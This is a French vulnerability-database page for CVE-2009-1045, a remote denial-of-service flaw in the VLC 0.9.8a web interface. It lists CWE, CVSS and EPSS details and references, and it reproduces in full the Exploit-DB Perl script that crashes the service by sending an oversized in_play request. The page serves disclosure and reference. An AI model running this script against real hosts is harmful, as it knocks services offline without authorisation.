CVE-2009-1045 : Détail

CVE-2009-1045

A03-Injection
9.29%V3
Network
2009-03-23
15h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

requests/status.xml in VLC 0.9.8a allows remote attackers to cause a denial of service (stack consumption and crash) via a long input argument in an in_play action.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8213

Date de publication : 2009-03-15 23h00 +00:00
Auteur : TheLeader
EDB Vérifié : Yes

#!/usr/bin/perl ######################################################## ## VLC 0.9.8a Web UI Remote Stack Overflow (DoS) by TheLeader ## GreetZ: forums.hacking.org.il ## TiP oF TEh DaY: Rock on! =] ######################################################## use IO::Socket; my $host = shift || 'localhost'; # Target host my $port = shift || 8080; # Target port. Default port = 8080 #Note: for some reason, A x 2070785 = terminate without crash; my $req = "GET /requests/status.xml?command=in_play&input=" . "A" x 2000000 . " HTTP/1.1\r\n"; $req .= "Host: $host:$port\r\n"; $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)\r\n"; $req .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $req .= "Accept-Language: he,en-US;q=0.7,en;q=0.3\r\n"; $req .= "Accept-Encoding: gzip,deflate\r\n"; $req .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n"; $req .= "Keep-Alive: 300\r\n"; $req .= "Connection: keep-alive\r\n"; $req .= "Referer: http://$host:$port/\r\n\r\n"; print "\nConnecting to $host on port $port\n"; my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp'); $sock or die "Cannot connect to server: $!"; print "Sending HTTP request..\n"; print $sock $req; print "Exploited. Target should be DoSed by now :)\n"; close $sock; # milw0rm.com [2009-03-16]

Products Mentioned

Configuraton 0

Videolan>>Vlc_media_player >> Version 0.9.8a

Références

https://www.exploit-db.com/exploits/8213
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.openwall.com/lists/oss-security/2009/03/17/4
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/34126
Tags : vdb-entry, x_refsource_BID